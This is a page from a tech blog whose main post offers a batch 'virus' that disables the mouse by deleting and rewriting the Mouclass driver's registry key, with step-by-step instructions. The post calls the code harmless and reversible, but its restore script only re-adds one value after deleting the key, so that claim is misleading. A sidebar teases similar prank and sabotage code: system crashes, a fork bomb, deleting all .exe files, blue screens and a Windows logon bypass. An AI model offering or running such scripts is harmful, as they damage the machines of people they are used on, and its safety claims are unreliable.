Thursday, 3rd April 2025
// Place side add here
Virus Programming/Batch File Programming
  • Continually pop out your friend’s CD Drive

    Description:  This is a harmless code, which will pop out your cd drive automatically, a

  • Code to Disable Task Manager

    Description: This is harmless code to temporary disable the task manager. You can enable it aga

  • Create Your Own Virus using Virus Maker Softwares

    In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares n

  • Only 5 Characters are enough to Crash a System: Fork Bomb

    A fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters

  • Shutdown your friends computer while chatting

    Hack While chatting 1)  Make a shortcut on desktop by Right click on desktop, and

  • Blue screen of death

    rem --------------------------------- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) &

  • Batch code to Delete all exe's from a computer

    rem --------------------------------- rem Delete All Exe DIR /S/B %SystemDrive%\*.exe >> FI

  • Batch code to Crash a computer

    rem --------------------------------- rem Crash Computer echo start "" %0>>crash.bat echo st

  • Internet Tips
  • Trick to read blackout wiki page

    How to read blackout wikipedia page? Protesting against SOPA and PIPA bills,

  • Browse Privately Using Incognito Mode

    For times when you want to browse something Private, you must browse in 'incognito mode' &nb

  • Hacking Stuff
  • How to hack/Bypass windows logon p

    In response to query asked by Ameer Hasan Malik Did you forget your windows login passwo

  • Sql Injection For Beginners: Tutor

    Many times my readers have asked me to write about SQL Injection, but i always used to conside

  • Useful Softwares
  • Automate Repetitive tasks using Mo

    Through out a day, almost all computer user do many repetitive tasks on computer and

  • Transform your Windows7 laptop int

    In today's time, not even  every home has a laptop or computer, but every member

  • AntiVirus and Security Tips
  • Beware Adobe Software Upgrade Noti

    An email pretend to come from Adobe has been widely spammed out, Which has a malware in atta

  • Scan NewsFeed for threats with Nor

    It is very common to see bad infected link/video shared on your wall by some of your noob friend

  • Virus coding to Disable the mouse


    Description:
    This is harmless code to temporary disable the mouse by editing the registry. You can enable it again with no hassle. 


    Code:

    rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------

    Testing:-
    1.Copy the code above, paste in in notepad, and save it with any name having extension .bat.
    2. Click the bat file to disable Mouse.




    Enable Mouse Again:-
    To enable Mouse again, copy the code below, make a bat file and click on it.


    rem ---------------------------------
    rem Enable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 1
    rem ---------------------------------









    author

    Written by:

    Surbhi is Founder of Techbyte4u.com. Follow her on Twitter or email her

    Bookmark and Share

    1 comments for this post

    1. aweseome i've benn searching the whole internet for this hack but no good result thnx for posting that but can you plzz post the code for reactivating the mouse for testing if it works!!!!

    Leave a reply

    TechByte4U on FaceBook
    Videos on Tech Byte 4 U